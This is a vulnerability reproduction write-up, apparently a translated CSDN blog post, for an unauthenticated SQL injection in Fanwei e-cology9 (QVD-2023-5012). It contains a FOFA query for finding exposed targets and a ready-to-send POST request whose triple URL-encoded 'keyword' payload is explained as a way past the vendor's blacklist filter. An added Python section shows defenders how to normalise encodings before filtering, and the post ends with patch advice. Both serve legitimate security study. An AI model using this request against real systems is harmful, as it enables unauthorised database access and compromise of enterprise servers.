Fanwei e-cology9 SQL injection vulnerability reproduction (QVD-2023-5012)

1. Product introduction

Fanwei's collaborative management application platform e-cology is a large-scale enterprise collaborative management platform that brings together an enterprise information portal, knowledge document management, workflow management, human resource management, customer relationship management, project management, financial management, asset management, supply chain management and data center functions.

2. Vulnerability overview

Fanwei e-cology9 contains a SQL injection vulnerability. An unauthenticated remote attacker can use it to obtain sensitive information from the database, and further exploitation may lead to the target system being compromised.

3. Affected scope

Affected versions

Fanwei e-cology9 <= 10.55

Unaffected versions

Fanwei e-cology9 >= 10.56

4. Reproduction environment

FOFA: app="Panwei-Collaborative Business System"

5. Vulnerability reproduction

Access the vulnerable environment, capture the request with Burp and send it to the Repeater module.

POC currently circulating on the Internet:

POST /mobile/%20/plugin/browser.jsp HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded
Content-Length: 651

isDis=1&browserTypeId=269&keyword=%2525%2536%2531%2525%2532%2537%2525%2532%2530%2525%2537%2535%2525%2536%2565%2525%2536%2539%2525%2536%2566%2525%2536%2565%2525%2532%2530%2525%2537%2533%2525%2536%2535%2525%2536%2563%2525%2536%2535%2525%2536%2533%2525%2537%2534%2525%2532%2530%2525%2533%2531%2525%2532%2563%2525%2532%2537%2525%2532%2537%2525%2532%2562%2525%2532%2538%2525%2535%2533%2525%2534%2535%2525%2534%2563%2525%2534%2535%2525%2534%2533%2525%2535%2534%2525%2532%2530%2525%2534%2530%2525%2534%2530%2525%2535%2536%2525%2534%2535%2525%2535%2532%2525%2535%2533%2525%2534%2539%2525%2534%2566%2525%2534%2565%2525%2532%2539%2525%2532%2562%2525%2532%2537

Note: three parameters must be passed in the POC:

1. isDis must be 1

2. browserTypeId selects the corresponding method (269 in the POC above)

3. keyword is the injection point; it must be URL-encoded three times to get past Fanwei's filtering mechanism (the blacklist replaces matched keywords with full-width characters)

Querying the database version information confirms the injection point.

Reproduced successfully.
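The bypass in note 3 works because the filter inspects the parameter before it has been fully decoded, so a value wrapped in several encoding layers contains no recognisable keyword at the moment the blacklist looks at it. The Python below is an added illustration for defenders, not code from the original post or from Fanwei: it contrasts a single-pass keyword blacklist with a check that percent-decodes the value until it stops changing and treats more than one encoding layer as a signal in itself. The keyword list and the sample value are constructed for the example.

```python
from urllib.parse import quote, unquote

# Illustrative keyword list for the demo; not Fanwei's actual blacklist.
SQL_KEYWORDS = ("union", "select", "@@version", "information_schema")


def naive_blacklist(raw_value: str) -> bool:
    """Single-pass check on the parameter as it arrives (still percent-encoded).
    This is the weakness the write-up relies on: a value encoded more than once
    shows no keyword at this stage, so the filter never fires."""
    low = raw_value.lower()
    return any(k in low for k in SQL_KEYWORDS)


def decode_until_stable(value: str, max_rounds: int = 5):
    """Percent-decode repeatedly until the string stops changing.
    Returns (fully decoded value, number of encoding layers removed)."""
    layers = 0
    while layers < max_rounds:
        decoded = unquote(value)
        if decoded == value:
            break
        value, layers = decoded, layers + 1
    return value, layers


def hardened_check(raw_value: str) -> dict:
    """Normalise first, then inspect. More than one encoding layer is itself a
    strong signal: ordinary clients percent-encode a parameter exactly once."""
    decoded, layers = decode_until_stable(raw_value)
    low = decoded.lower()
    return {
        "layers": layers,
        "nested_encoding": layers > 1,
        "sql_keywords": [k for k in SQL_KEYWORDS if k in low],
    }


def percent_encode_all(value: str) -> str:
    """Encode every byte, as the POC does, so no keyword survives in clear text."""
    return "".join(f"%{b:02X}" for b in value.encode())


# Constructed sample input: a keyword-bearing value under three encoding layers,
# mirroring the triple-encoded 'keyword' parameter in the POC above.
SAMPLE = quote(quote(percent_encode_all("1 union select @@version"), safe=""), safe="")

if __name__ == "__main__":
    print("naive blacklist flags it:", naive_blacklist(SAMPLE))  # False
    print("hardened check:", hardened_check(SAMPLE))
```

Even after normalisation a blacklist stays fragile; the durable fix for this class of bug is parameterised queries on the server side.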


6. Remediation

The vendor has released an official security patch; affected users are advised to upgrade to version 10.56 or later as soon as possible.

https://www.weaver.com.cn/cs/securityDownload.asp

Origin blog.csdn.net/qq_41904294/article/details/129677395